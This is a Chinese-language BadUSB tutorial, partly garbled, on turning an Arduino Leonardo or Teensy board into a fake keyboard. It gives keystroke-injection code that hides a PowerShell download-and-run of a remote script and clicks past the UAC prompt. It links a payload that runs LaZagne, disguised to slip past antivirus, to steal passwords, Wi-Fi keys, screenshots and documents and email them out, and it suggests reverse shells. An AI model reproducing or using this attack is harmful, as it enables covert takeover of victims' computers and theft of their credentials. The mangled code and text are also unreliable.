tydh配置文件通过硬件直接插入对方电脑,使对方电脑执行代码,达到干扰、主机控制、信息被盗等目的。
威胁BadUSB的威胁是USB内存固件中存在恶意代码,PC上的防病毒软件无法访问USB内存固件所在的区域。 因此,无论是杀毒软件还是u盘的格式都意味着无法应对BadUSB的攻击。
原理硬件知识的基础HID攻击HID是Human Interface Device的缩写,它的名称表明HID设备是与人直接交互的设备,如键盘、鼠标和操纵杆。 但是,HID设备不一定需要人机接口,只要是符合HID等级标准的设备都是HID设备。 因为一般来说,对HID的攻击主要集中在键盘鼠标上,如果控制用户的键盘,基本上就是控制了用户的电脑。 攻击者将攻击隐藏在普通鼠标键盘中,当用户将包含攻击向量的鼠标或键盘插入计算机时,恶意代码将加载并执行。
Teensy攻击者在定制攻击设备时,会在USB设备中放入攻击芯片。 这个攻击芯片是一个非常小、功能完整的单片机开发系统,它的名字叫Teensy。 TEENSY允许您模拟键盘和鼠标。 当bldzjy插入此定制USB设备时,计算机将其识别为键盘,并利用设备中的微处理器、存储空间和编程攻击代码向主机发送控制命令,以完全控制主机
Arduino Arduino是一个方便、灵活、易于使用的开源电子原型平台。 它构建在开源的simple上
I/O接口版,具有Java、c语言等处理/无线开发环境。 主要有两个主要部分。 硬件部分是可用于电路连接的Arduino电路板。 另一个是Arduino IDE,是你计算机的程序开发环境。 在IDE中编写程序代码,将程序上传到Arduino基板上,程序就会告诉Arduino基板该做什么。
插入攻击进程Bad-Usb后,模拟键盘鼠标操作计算机,这些操作打开计算机的命令终端,从指定的网址下载其他代码并在后台静默运行这些代码功能包括窃取信息、排斥shell和发送邮件,目的是控制目标计算机和窃取信息。
为工具硬件1286或2303芯片创建u盘
这里使用BS Micro pro micro leonardo Arduino开发板
淘宝链接:
https://item.taobao.com/item.htm? SPM=a230r.1.14.74.LG B3 ubid=44364709185 ns=1ab bucket=12 # detail
软件1 Arduino IDE
kali自带,双赢下载链接:
3358 downloads.arduino.cc/arduino-1.6.4-windows.zip
下载为zip,不需要安装,直接解压缩即可使用。
2 teensy duino http://www.pjrc.com/teensy/TD _ 123/teensy duino.exe
如果下载并双击运行,则安装过程中将安装设备驱动程序,并按照说明进行安装。
注意:安装时必须手动选择Arduino IDE的安装位置。 如果是这样,请选择上一步中zip的解压缩目录。
安装成功后,运行arduino.exe可以看到这里有很多选项。
根据上一个案例中使用的硬件,如图所示,选择名为Arduino Leonardo的项目。
步骤1创建硬件将IDE硬件连接到计算机并打开Arduino IDE工具-版本Arduino Leonardo工具-端口-“com * (arduino Leonardo )”
二维码写入硬件将以下代码复制到IDE中: 代码在后面
将代码中的http://www.cdxy.me/main.ps1重命名为您的域名,然后单击IDE左上角的对号图标验证,再单击箭头图标硬件
将硬件重新插入计算机时,计算机自动执行代码的所有动画过程void setup (() Delay ) ) 5000 ); keyboard.press(key_left_ctrl; keyboard.press(key_ESC; Keyboard.releaseAll (; dlay(500; eyboard.print (powershell-windowstylehiddeniex (new-object net.webclient ).downloadstring ) http://www.cdxy.cdxy keyboard.press(key_left_ctrl; keyboard.press(key_left_shift;
Keyboard.press(KEY_RETURN); Keyboard.releaseAll(); delay(2500); Keyboard.press(KEY_LEFT_ALT); Keyboard.press('y'); Keyboard.releaseAll(); delay(1500); }void loop() {}代码解释:
插入后等待五秒,
按下ctrl+esc,(作用:在任何界面打开开始菜单)
等待半秒,
模拟输入一个字符串,并回车执行(作用:在开始菜单执行命令)
等待2.5秒,更改焦点,模拟键盘输入y(作用:绕过uac,得到系统许可)
到此为止,硬件的设置已经完成,当硬件插入之后,系统会模拟键盘输入执行:
powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString('http://www.cdxy.me/main.ps1'
也就是从域名下面的main.ps1文件下载代码并执行。
以下代码可在我的github下载:
https://github.com/Xyntax/BadUSB-code
入口文件为GetPass.ps1,修改GetPass.ps1中的前两行,域名,Getpass.rar实际上是lazagne,用rar下载尽量避免出发安全软件,这个不放心可以百度下载。command.rar实为bat 因为 lazagne注入lsass时会被安全软件拦截,所以用bat避免注入。修改GetPass.ps1中的邮箱配置,同main.ps1中的就行将这四个文件上传到公网服务器
4 测试 插入硬件,观察电脑是否自己打开了开始菜单并执行命令,bldzjy看到powershell的黑色框一闪而过时,就可以拔下硬件了。此时电脑后台下载并运行代码,过几分钟邮箱就会收到邮件,一共两封。
打开两个附件是这个样子的
GetPass结果:
屏幕截图、wif密码、文档窃取、本地dump结果:
理解原理之后,通过修改服务器端代码,利用方式可有很多,如反弹shell或者开3389等,代码这里就不提供了,您比我懂,欢迎交流。
参考及感谢 BadUsb—-结合实例谈此类外设的风险利用烧鹅制作简单BadUSB,插着急的小虾米怀孕HID攻击之TEENSY实战新的U盘自动运行——BadUSB原理与实现感谢HackPandaymdyj的技术支持和答疑解惑!